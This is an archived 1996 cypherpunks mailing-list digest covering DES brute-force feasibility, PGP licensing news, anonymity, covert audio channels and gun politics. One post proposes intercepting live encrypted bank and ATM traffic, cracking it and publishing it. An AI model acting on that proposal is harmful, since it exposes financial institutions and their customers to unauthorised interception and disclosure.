Chris.Claborne@SanDiegoCA.NCR   .Com   ...(*)/(*).        CI$: 76340.2422
http://bordeaux.sandiegoca.ncr.com/
PGP Pub Key fingerprint =  7E BF 38 3F 24 A7 D1 B0 54 44 96 AA 10 D0 5D 51
Avail on Pub Key server.
Dreams.  They're just screen savers for the brain.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dave banisar <tc@phantom.com>
Date: Thu, 25 Jul 1996 03:21:37 +0800
To: cypherpunks@toad.com
Subject: Re: the VTW---FBI Connection (fwd)
In-Reply-To: <Pine.LNX.3.94.960723144843.21461A-100000@big.aa.net>
Message-ID: <v03007600ae1bf9c26983@[204.91.138.177]>
MIME-Version: 1.0
Content-Type: text/plain


Damm. Flushed out.  I thought we swould be able to hide this.

-d

>>>Now the big question: What is the FBI trying to do getting all these
>>>names? What else has "VTW" been doing? And what other organizations like
>>>them are there? Who else is in on it? What does this say about EPIC,
>>>CDT, EFF?
>>>Are Blaze and Schneier dupes, or willing participants? What about their
>>>ISP? I think we are all owed an explanation. This is serious. Maybe FOIA or
>>>a lawsuit before they burn the files.
>>>
>>>What do you want to bet "VTW" quietly fades away after a few prefunctory
>>>denials, and gets replaced by another organization in due course?
>>>
>>>Faithfully,
>>>
>>>Net reporter team Alice and Bob
>>>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 25 Jul 1996 06:27:17 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <2.2.32.19960724111141.008bb63c@panix.com>
Message-ID: <Pine.LNX.3.93.960724120815.1099B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Jul 1996, Duncan Frissell wrote:
> At 03:38 PM 7/23/96 -0400, hallam@Etna.ai.mit.edu wrote:
> >The facts are very clear, if you have a handgun in the house it is
> >far more likely to kill a member of the familly than stop an
> >intruder. The NRA know this which is why they have lobbied for the
> >CDC to stop research in this area - they do not like the facts.
> And most people who die after jumping out of airplanes have (defective)
> parachutes.  Therefore it is safer to jump out of airplanes without parachutes.
> The CDC sucked suicides into the mix to cook the books and suicide by
> firearms is a *legitimate* use of same.  Surely you believe in the "right to
> die," don't you?

     Why is the CDC getting involved in gun death? Is lead a virus? Can you 
catch Colt .357itis? Is there a vaccine that doesn't leave you brainless and 
statist?

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 25 Jul 1996 04:22:06 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Brute Force DES
In-Reply-To: <Pine.LNX.3.94.960724063243.1558B-100000@switch.sp.org>
Message-ID: <199607241617.MAA18214@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



The Deviant writes:
> Buy the point is to prove that DES shouldn't be used, not that it CAN
> be brute forced.  A known-plaintext attack doesn't show that.  We hafta
> attack something we've never seen. (i.e. talk Netscape, or some other
> company, into generating a DES'd message, and keeping the keys safe)

Known plaintext isn't needed. You just need a plaintext with some
decent statistical properties.

Dave Wagner has some information on this.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 25 Jul 1996 06:12:30 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <9607231938.AA01857@Etna.ai.mit.edu>
Message-ID: <Pine.LNX.3.93.960724121604.1099D-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Jul 1996 hallam@Etna.ai.mit.edu wrote:
> The facts are very clear, if you have a handgun in the house it is
> far more likely to kill a member of the familly than stop an
> intruder. The NRA know this which is why they have lobbied for the
> CDC to stop research in this area - they do not like the facts.

     That family member is usually not killed in an accident. You are 
also more likely to be stabbed by a family member, beaten by a family 
member, raped by a family member, and stolen from by a family member. 

     Maybe we should outlaw families. 

> As someone who qualifies to be issued with a handgun under the UK
> regulations I have been informed that the protection offered is
> marginal at best. An intruder is certain to be more prepared than
> the intended victim, it is extreemly unlikely that the intruder will
> not get the first shot in.

      This sir is pure crap. In fact it is far more likely that an armed 
and prepared occupant will take out a thug. There have been 2 cases here 
in Chicago where elderly citizens (one 86 years old, and in a wheelchair)
got the drop on teenage hooligans that were in the process of burglarizing
their homes (in the case of the 86 year old, sexual assault was also occuring)
In both cases at least on of the perps died. As they deserved too. 

      These people (burglars) are not worth the bullet it takes to get rid of 
them. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Thu, 25 Jul 1996 04:41:04 +0800
To: furballs@netcom.com>
Subject: Re: Noise: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <Pine.3.89.9607240016.A9441-0100000@netcom>
Message-ID: <9607241624.AA06524@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>Talk shows that attempt to stimulate active thought on reasonable premise 
>generally do not survive long in syndication. With Limbaugh's show, it 
>took a double hit as the markets it played to were for the most part late night. 
>BTW, this comes from actually looking it up in past TV Guides - not 
>mindlessly drooling over the radio - so put away the "he's lying" crap.

And why did the networks put Rush on so late? Could it be that
he did not pull in the viewers?

>Following the shallow logic of your argument, Limbaugh is not a success 
>because he does not broadcast on TV. 

It is shallow logic, but it is Rush's own logic. He promotes the
idea that success is measured in ecconomic terms. The failure of his
TV show demonstrates the failure of his ideas under the criteria 
which he himself espouses.

>The issue I take with this, is the constant spouting of King Bill's 
>pronouncement of why OKC occured in the first place. We don't know WHY it 
>took place - that's what a trial is for (if you actually believe that 
>justice is blind and lawyers tell the truth always). We will NEVER really 
>know - but it's damn fine political fodder to take an unconstitutional 
>swipe at the populous with the anti-terrorist legislation.

That is not what the trial will decide. The question is who and what,
why is irrelevant given the nature of the offense.

>If you firmly believe the premise that Fascism was the root cause behind 
>OKC, then you have no choice but to look to the White House and Capital 
>Hill. 

Nope, I look to the millitas, Chritian Identity, the Klu Klux Klan 
and their appologists including Liddy and Limbaugh. If you read
the propaganda that the NAZIs used you will find it if anything 
less direct than Liddy or Buchannan. The NAZIs did not advertise their
intention to commit mass murder, they used code words. When Buchannan
refers to "Hose" he is using a codeword he knows will be understood.


		Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alex F" <alexf@iss.net>
Date: Thu, 25 Jul 1996 04:57:38 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Digital Watermarks for copy protection in recent Billbo
Message-ID: <199607241653.MAA22114@phoenix.iss.net>
MIME-Version: 1.0
Content-Type: text/plain



> >Yes, but concievably if (whoever would be incharge, FBI?) *could*,
> >under law do this, even if they are wrong.  It is a lot harder to
> >prove that they intentionally harrassed *you* than it is for them to
> >say that they were following leads and show evidence.  Yes, this may
> 
> To go to trial, an indictment would be needed. How likely is this?

The likelyness is irrelevant to the point.  Possibility is relevant.  
Probability is not.

> Discussion of "in theory they could arrest you" points often neglects the
> realities of the legal system.

Does that really matter? .  In REALITY, it 
will never be enforced.  So what?  The potential is still there, and 
in essence, that is ALL that matters!  The discussion of "in 
theory...." doesn't neglect the realities of the legal system, rather 
it highlights the POTENTIAL for abuse.  Even if the law is never 
enforced, could it not be used as an example to justify other laws 
that *may* be introduced?  Does it not set a dangerous precedent?    We 
are talking about dangerous empowerment  here.

Hmm. The arguement "well, we would never REALLY enforce it" just 
doesn't hold water with me, and makes me uncomfortable.

> A large fraction of pawnshop items have questionable provenance, the items
> having been stolen at some time in the past. Could J. Random Buyer who
> walks in, sees an item he likes, buys it, and walks out with it be
> handcuffed and taken down the lockup for the crime of buying stolen
> property? Doubtful, in the real world. And defense would be ridicuously
> easy.

A defense would be easy, fine.  But it would still cost $$$.  Do you 
see what I am getting at?  This is done ALL THE TIME (no, not at pawn 
brokers.  I'm talking about taking advantage of either cost or time 
to get what you want).


> A trivial increase in frequency, and still not allowing the hypothesized 30
> KHz signal to be added. DATs often sample at 44 and 48 KHz, switchably. The
> CD standard is of course still what it is.

That's not the point.  What we are talking about here is a covert 
channel.  Whether it is at 30KHZ, 22KHz or right in the middle of the 
audible range.  Mine was ONE proposal, a theory of sorts, thought up 
off of the top of my head as a possible way of doing this.  

You can also add a digital serial number right in the audible range, if 
you like.  Static that is recorded along with analog sound is at certain 
frequency ranges, typically.  When you have a disk that holds 640Mb 
or so the serial number's size is trivial in comparison.  Sending the 
whole number at once will barely be audible even if in a good 
frequency range simply because of speed.  If you send it in bits and 
pieces during the song, and furthermore record this data in the 
middle of the frequency range where static is located, you won't hear 
it anyway.  However certain devices will be able to read the data w/o 
problem.

Similarly, you have a CD, let's say Beethoven's 9th symphony.  You 
have ~640 MB on the CD.  If you want to sneak someone an encrypted 
message, say a top secret document and it is compressed down to 1K, 
then putting this into the audio signal as described above is fairly 
trivial.  The other end doesn't even need to know bit counts.  The 
document can be spreadout, reversed, whatever and just signaled w/ a 
flag (much like PPP and other protocols).  All the other end needs to 
decode is a flag at a set frequency range, both of which can be constantly 
changed. 

interestingly,

Alex F
=-=-=-=-=-=-=-=-=-=-=-=-=-
Alex F    alexf@iss.net
Marketing Specialist
Internet Security Systems
=-=-=-=-=-=-=-=-=-=-=-=-=-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: reagle@rpcp.mit.edu (Joseph M. Reagle Jr.)
Date: Thu, 25 Jul 1996 05:15:39 +0800
To: cypherpunks@toad.com
Subject: FTP Software Licenses Pretty Good Privacy 07/23/96
Message-ID: <9607241721.AA01343@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



  	  				 
HAMBURG, GERMANY, 1996 JUL 23 (NB) -- By Sylvia Dennis. FTP Software,  
the Internet/connectivity software company, has licensed Pretty Good 
Privacy's encryption technology of the same name (PGP). Plans now call 
for FTP to integrate PGP within its range of TCP/IP (Transmission 
Control Protocol/Internet Protocol) software. 

Under the terms of the agreement, PGP has licensed its encryption  
software to FTP for use in OnNet32 2.0 for Windows 95 and Windows NT, 
both versions of which will ship in the third quarter of this year on 
both sides of the Atlantic. 

Tom Steding, PGP's chief executive officer, said that a critical piece  
of the company's business strategy is to proliferate the "seamless 
integration of encryption technology" within e-mail applications 
programs. 

"We see this partnership as a powerful combination of two leaders who,  
together, will use their considerable market weight and technical 
expertise to promote and enhance the PGP towards becoming a 
universally accepted industry standard," he said. 

According to Rebecca Buisan, product marketing manager with FTP, the  
company has made several enhancements to OnNet32 to integrate PGP into 
its basic functions. There is now a two icon system which allows users 
to access a tool bar, designating options to encrypt or decrypt a 
message, and make a digital signature. Mail messages can also be left 
on a server or computer in an encrypted format, to be decrypted and 
read at will. 

"Experience has proven that cryptography only works if implemented  
effectively, so that it is simple for the user," she explained. 

According to Buisan, FTP has conducted extensive human factors testing  
to fine-tune PGP's cryptographic software into a "flexible and 
intuitive application that people will be encouraged to use." 

According to FTP, its implementation of the PGP encryption software  
is interoperable with current freeware versions available for free 
download from the Massachusetts Institute of Technology (MIT) or one 
of the many other FTP (File Transfer Protocol) sites that distribute 
the package. The MIT site is at http://web.mit.edu/pgp . 

PGP was originally developed in 1991 by Phil Zimmerman. The package  
allowed PC users, for the first time, to send information in a secure 
encrypted format without fear of intervention. 

FTP's Web site is at http://www.ftp.com .  

(19960722/Press & Reader Contact: Manuela Dorken, FTP Software,  
+49-89-614130, Internet e-mail manuela@ftp.com; PGP, 415-631-1747, 
Internet e-mail info@viacrypt.com) 
  	   	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: talon57@well.com
Date: Thu, 25 Jul 1996 08:08:31 +0800
To: cypherpunks@toad.com
Subject: Re: Distributed DES crack
Message-ID: <199607242028.NAA20103@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Matt Blaze scribes:

>My estimate is that an FPGA-based machine that can do a single DES
>key every four months (eight months to exhaust the whole keyspace)
>could be built with off-the-shelf stuff for comfortably under $50k
>(plus labor, plus software development costs).  A prototype board
>should cost under $1000 and will help prove the concept and get a
>more accurate cost estimate.  I expect to build such a prototype
>machine myself, and, if it works as I expect, maybe the whole
>thing.

>-matt

If the price is reasonable, I for one would be willing to donate
the bucks for a FPGA chip or two to see this get built:

--------------------
| Chip donated by  |
| talon57@well.com |
--------------------

The very existance of this device in the real world would make our
point better than anything I've yet heard.

Imagine being at a hearing and having the physical device sitting
there before the judges......

Brian







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 25 Jul 1996 07:50:00 +0800
To: hallam@Etna.ai.mit.edu
Subject: LIMBAUGH ON TV
In-Reply-To: <9607241624.AA06524@Etna.ai.mit.edu>
Message-ID: <Pine.SUN.3.91.960724131940.15926A-100000@crl3.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 24 Jul 1996 hallam@Etna.ai.mit.edu wrote:

> It is shallow logic, but it is Rush's own logic. He promotes the
> idea that success is measured in ecconomic terms. The failure of his
> TV show demonstrates the failure of his ideas under the criteria 
> which he himself espouses.

Or maybe he is uping the ante.  Tell you what Phil, I'll bet you
US$50 aganist your L25 (in other words, I giving you odds at the
current rate of exchange) that Limbaugh have a nationally TV show
on or before 1 October 1996.

If you are willing to put your money where your mouth is, just
say you agree to these terms in a post to the list.  After that,
we can agree to appoint someone to declare a winner and hold the
money in the meantime.  Any volunteers for the honor?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Thu, 25 Jul 1996 05:36:31 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <01I7GBFL287694F9CD@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[ To: cypherpunks ## Date: 07/19/96 08:13 pm ##
  Subject: Message pools ]

>Date: Wed, 17 Jul 1996 23:19:59 -0700
>From: Bill Stewart <stewarts@ix.netcom.com>
>Subject: Re: Message pools _are_ in use today!

>>2. The authorities already have identified a suspect, call him "Bob," and
>>wish to know if he reading (and perhaps decrypting) messages to "Alice."

>>As several of us have noted, #1 is tough--real tough. The authorities would
>>have to contact 10,000 or more ISPs who have local newsfeeds and subpoena
>>their logs of who read which newsgroups...assuming such logs are even kept

>Getting everybody is tough.  Getting a lot of the potential suspects,
>however, isn't as tough as it looks - the vast majority of home Internet
>users are on AOL, Compuserve, Prodigy, UUNet, Netcom, or (RSN) AT&T.
>Anonymous Message Pool users are a bit more likely to use niche-market ISPs,
>especially under pseudonyms, but if the number of users increases
>significantly there'll still be a reasonable proportion on the big carriers,
>which are probably more cooperative and probably keep more complete logs.

There are two other factors.

1.   If you're trying to figure out who anonymously posted the ``All
faggots must die'' message on alt.sex.motss, you have a very large
number of potential suspects. However, if you're trying to figure
out who anonymously posted the ``how to manufacture nerve gas''
post, your suspect list is quite a bit smaller.  The condition for
technical information about cryptography or computer security is
similar.

2.   It may be that the way you test your suspects is parallelizable
enough that you can do a ``dictionary attack,'' in which you go down
a list of people who you might suspect of posting something for one
reason or another, and test the hypothesis that each of them
actually did post it.  Suppose I have such a test which can rule out
75% of my suspect list.  This becomes a useful tool--especially if I
can track multiple posts by the same user and rule out more and more
of my suspect list as more and more messages are posted.

I wouldn't count on even heavily-chained anonymous remailer messages
to protect my identity from moderately wealthy and determined
attackers, if I did many anonymous posts.  Writing style and topic
alone may narrow the suspect list down to a manageable number.

># Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
># http://www.idiom.com/~wcs

   --John Kelsey, jmkelsey@delphi.com / kelsey@counterpane.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfZezUHx57Ag8goBAQGe+AP/fYWAfHmFwVdYvoQjAtcIAH5csUb2pWQi
GYfsluIY1Wn2sPTxf+2GoVvfmwRlhAgwGtOTav83tsP8KN6uB6MJTe3NO67gL7Cx
W1U7yNgC0Ebuyoxr4Hi4p3d0s57wroscy15O7/XgZ3Fcu+yi0lSoJOML86hipCUc
plb/XsYBLLE=
=sEbh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 25 Jul 1996 10:06:16 +0800
To: cypherpunks@toad.com
Subject: Re: Brute Force DES
In-Reply-To: <199607241617.MAA18214@jekyll.piermont.com>
Message-ID: <uH1kRD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:

> 
> The Deviant writes:
> > Buy the point is to prove that DES shouldn't be used, not that it CAN
> > be brute forced.  A known-plaintext attack doesn't show that.  We hafta
> > attack something we've never seen. (i.e. talk Netscape, or some other
> > company, into generating a DES'd message, and keeping the keys safe)
> 
> Known plaintext isn't needed. You just need a plaintext with some
> decent statistical properties.

May I suggest that a better demonstration for the public would be to allow any
person take a pre-determined text (such as "cypherpunks"), encrypt it wtih a
key of their choice (40-bir or 56-bit, depending on what we're trying to prove),
(i.e. demonstrating that some 40-bit key scheme is unsafe may be sufficient )
send the cyphertext to a GruborBot via e-mail or Web page, and get back within
reasonable time the key(s) that were used.  I think this is feasible; whether
it's all lookup table or some lookup and some computation is details.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 25 Jul 1996 10:21:07 +0800
To: cypherpunks@toad.com
Subject: Data Sources for DES Breaking
Message-ID: <199607242051.NAA13352@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Given that we might embark upon this public demonstration of the
fragility of single DES, what should we use for test data?

If a lone Cypherpunk simply encrypts a file with DES-ECB, hides
the key in a drawer, and publishes the cyphertext and plaintext
for use in a distributed cracking effort, there will of course
be the suggestion that the exercise was rigged, and any public
policy implications will be lost in the endless "Was So/Was Not"
quibbling which will undoubtedly take place after the crack is
complete.

Given that most of the people currently singing the praises of
single DES live in the banking industry, which has so far
resisted all reasonable suggestions that it is time for them to
move to something stronger, it would seem almost obvious that
this crack should be done on some form of live financial data,
such as might be obtained if one were to capture bits passing
over publicly accessible phone lines between various financial
institutions, ATM machines, and centralized computer facilities.

The ideal data would be replete with prepended fixed headers
which could be used as a wedge for a known plaintext attack, and
should be sufficiently sensitive that breaking it will result in
scandalous tabloid headlines and numerous opportunities for
Cypherpunks to promote their policy agenda in the media.

DES is, after all, a prime example of the type of encryption one
gets when the government, rather than the brightest minds in the
private sector, are in charge of determining National Crypto
Policy and mandating the use of "approved" techniques.

I would suggest we obtain the test data for this exercise as soon
as possible, and widely disseminate it on the Net.  There is no
need to wait until we have distributed cracking software ready to
go before doing this, and having the actual data to play with
while munging the code together may lead to some new insights as
to efficient ways to attack the problem.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 25 Jul 1996 05:45:56 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Brute Force attack Question
In-Reply-To: <199607241550.KAA00886@galaxy.galstar.com>
Message-ID: <199607241758.NAA18324@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Igor Chudov writes:
> What is Alice and Bob decide to obscure their letters and add random
> NON-ASCII  characters at random places?

Assuming I'm using a statistics based technique, that won't help.

Superencipherment might, but then again, thats sort of what 3DES is, right?

> If percentage of ASCII characters in all 256 byte space is 40%, Alice
> and Bob may agree to put in junk characters to make up exactly 60% of
> the message. This way messages will look like random character data.

Nope, it wouldn't. The statistics would be off.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 25 Jul 1996 13:03:17 +0800
To: Remo Pini <cypherpunks@toad.com
Subject: Re: Distributed DES crack
Message-ID: <199607242110.OAA13373@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:34 PM 7/24/96 +0200, Remo Pini wrote:

>By the way, using FPGA's (as suggested earlier) at around 100 MHz should be
>extremely fast (after all, on one 100000 Gate FPGA, one should be able to 
>do lot of parallel things at one clock cycle -> test several keys at 
>once...).
>I estimate, that at reasonable cost (lets say, <$500) you should be able to 
>put enough FPGAs on a board to do enough keys in parallel to equal 1 key 
>per cycle, i.e. 1e8 keys/sec.

I'm skeptical of any attempt to use general-purpose computers to crack DES.  
For example, if you could get a Pentium-class system to try 100,000 keys per 
second, that's about 200 million machine hours for a total keyspace search. 
Even if the power consumption of the hardware was the only cost, and 
assuming you could get the consumption of an individual machine down to 100 
watts, that's 20 million kilowatt-hours  of electricity, or somewhere around 
$1.5 million at 7.5 cents per kwh.  That's not particularly promising.

However, assuming DES can be implemented by a number of 64-bit wide 
pipelined stages within a single chip, it should be possible to have that 
chip do a single key per clock cycle, perhaps at about 50 megahertz. (This 
would probably be trivial on a full-custom chip.  Whether it could be done 
straightforwardly on a hard-wired gate array, or a FPGA, I don't know.)   
Tiled on a pc board perhaps 10 by 10, it would check 5 billion keys per 
second.  This works out to 167 days to search the entire keyspace.  

Electricity consumption is almost ignorable:  Even if that 100-processor 
board consumed 1 kilowatt, that's still only 4000 kilowatt-hours, or $280 at 
7.5 c/Kwh.  The reason for this enormous difference (about 5000 to one) is 
mostly due to the fact that general-purpose computers are very inefficient 
at solving this problem, but also partly because a typcal Pentium-class 
computer keeps a large amount of circuitry powered up all the time, and not 
just the portion needed to solve a CPU-bound task.

Obviously, costs other than electricity are the dominant factor with a 
specialized-hardware approach.  But the only attraction of the farmed-out 
(borrowed) general-purpose CPU approach is the fact that the computers are 
already paid for, and the elctricity will be paid for by somebody else.  
Once the average participant realizes how wasteful this solution is, he will 
likely balk.  It would be far more economical to take 10% of that 
electricity cost (possibly in the form of donations), maybe around $150,000, 
and build the custom hardware that could be used again and again.









Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Thu, 25 Jul 1996 11:55:58 +0800
To: "'cypherpunks@toad.com>
Subject: FW: Schelling Points, Rights, and Game Theory--Part II
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960724212138Z-4289@abash1.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	tcmay@got.net

>...certainly a Schelling point or evolutionary game
>theory interpretation of what we call "rights" is superior to an
appeal-to-God or "natural rights" interpretation.
........................................................................
.................


So there is the "game theory" interpretation of "rights" as would be
understood by an individual within a group of 2 or more, or a "society"
of many individuals, and then there is the interpretation of how anyone
might interpret the concept even if they were not a member of any
society but lived totally alone in the wilderness?

I don't know why these would be categorized as being part of a "game" -
evolutionary or otherwise.   A game is something that is evaluated
somewhat outside the context of our regular life - a diversion, an
accessory, even if it also can be taken seriously or if it can become a
career for some people.   It is not given the same significance as other
practical pursuits like medicine or engineering, which are intended to
have definite, practical, beneficial results.

Any person normally posseses some ability to determine the propriety to
themselves of certain things in existence:  they  have some measure of
ability to make judgements over what is "right" or "wrong" for humankind
similar to themselves.   Most people develop some sensitivity to the
difference between that which is destructive to the goals & values of
living things versus that which is supportive of them;  most everyone is
expected to improve the ability to think  about these things as they
grow up, even if they don't hold formal arguments with anyone else about
it.   

But people's minds work on overtime and just because they can make
judgements, they therefore do make judgements, and furthermore they
intend that everyone else should accept these same conclusions - they go
into "global mode", expecting that their perspective will be
incontestably valid over all.    

But I wouldn't think that they imagine themselves to be playing a game.
I think they're quite serious about it, and "rightly" so, as the
consequences of these decisions have major effects upon the quality of
their life and happiness.  I think  that to think of these concepts in
terms of game theory is to miss the place of significance which these
decisions have in the life of conscious, self-determining beings like
ourselves; that it doesn't do justice to the need to achieve
correspondence with the facts of life & molecular physics.   

Or,  what's the Prize for these Olympics (and who cares)?

    ..
Blanc

~ Blanc 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Thu, 25 Jul 1996 06:54:57 +0800
To: Damien Lucifer <root@HellSpawn>
Subject: Re: Question
In-Reply-To: <Pine.LNX.3.91.890904045721.557A-100000@HellSpawn>
Message-ID: <Pine.SCO.3.93.960724142217.17196A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Sep 1989, Damien Lucifer wrote:

> 
> On Tue, 23 Jul 1996 pjn@nworks.com wrote:
> 
> > OK...A question for you all:
> > 
<snip>

Man, this is strange.  I think C'punks just got time warped by Agents of
the Evil Empire or somethin'.  pjn wrote on 23 July 96, but Damien Lucifer
replied to it on 4 Sep, 1989!  Wow!  Somebody better call Special Agent
Mulder.

<insert X files theme music here>

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 25 Jul 1996 16:58:43 +0800
To: Llywarch Hen <cypherpunks@toad.com
Subject: Re: Game Theory and its Relevance to Cypherpunks
Message-ID: <199607250636.XAA06174@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:21 AM 7/21/96 -0700, Llywarch Hen wrote:
> What Timothy May espouses is not the appearance of craziness but actual
> insanity itself.

The best way to convince others you are crazy is to actually be crazy.

More practically, if you organize your nuclear forces so that any 
serious war is likely to escalate uncontrollably into the battle of 
armageddon, regardless of your intentions and desires, which is how 
the American government organized its nuclear forces in Europe, 
then you can pretty much guarantee you will not have to face a 
serious war.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Thu, 25 Jul 1996 10:51:13 +0800
To: "cypherpunks" <dlv@bwalk.dm.com>
Subject: Re: Boobytraps and the American Legal System
Message-ID: <199607242154.OAA16374@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


On 24 Jul 96 01:21:34 -0800, dlv@bwalk.dm.com wrote:


>I think Tim May is growing senile...

This is new? <g>

>> (Later examples were to be even worse. For example, the burglar who climbed
>> on a roof and stepped through a skylight. He sued, and won. I guess the
>> owner of the property was obligated to install night lights so burglars
>> could see their way, and to generally make his property more
>> "burglar-friendly."
>
>Actually, he fell through the roof of a school he was trying to burgalize.
>
>In a similar incident a burglar broke into a house that was being treated
>for pests (i.e., was full of toxic fumes). He died; his family sued the
>owners and won.
>
>Maybe someone can post a reference to these two cases. I recall that both
>happened in New York, but I could be wrong.

I remember hearing about a case on this end of the continent (west coast)
that involved  a store that had been robbed many times. The owner noticed
that most burglars came through the skylight, so he electrified it. Not
much of a charge, just something like 12 volts - enough to keep someones
hands off of it...  However, a klutzy burglar managed to fall into the
skylight and get stuck.  His partner deserted him.  Over the course of
several hours, he died... *ouch*  Needless to say, his next-of-kin sued
and won. The guy lost his store.


Another one I liked: in (I believe) Pennsylvania, a drunk peed on an
electrified third rail.  His next of kin sued the trolley company and
won...

A man tried to commit suicide in Chicago by jumping onto an El track.  He
was only crippled, so he sued and won!

// Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
// Automatically receive my resume or PGPKEY by sending email with a subject
// of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
 

                                                                                                                                                                                                                                             








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 25 Jul 1996 10:02:20 +0800
To: cypherpunks@toad.com
Subject: Re: FTP Software Licenses Pretty Good Privacy 07/23/96
In-Reply-To: <9607241721.AA01343@rpcp.mit.edu>
Message-ID: <Pine.GUL.3.94.960724145503.24951D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Yes, this was in InfoWorld a couple weeks ago. But...

> Under the terms of the agreement, PGP has licensed its encryption  
> software to FTP for use in OnNet32 2.0 for Windows 95 and Windows NT, 
> both versions of which will ship in the third quarter of this year on 
> both sides of the Atlantic.                                        ^^
  ^^^^^^^^^^^^^^^^^^^^^^^^^^

This is news. I'd asked for clarification of this point, but I guess
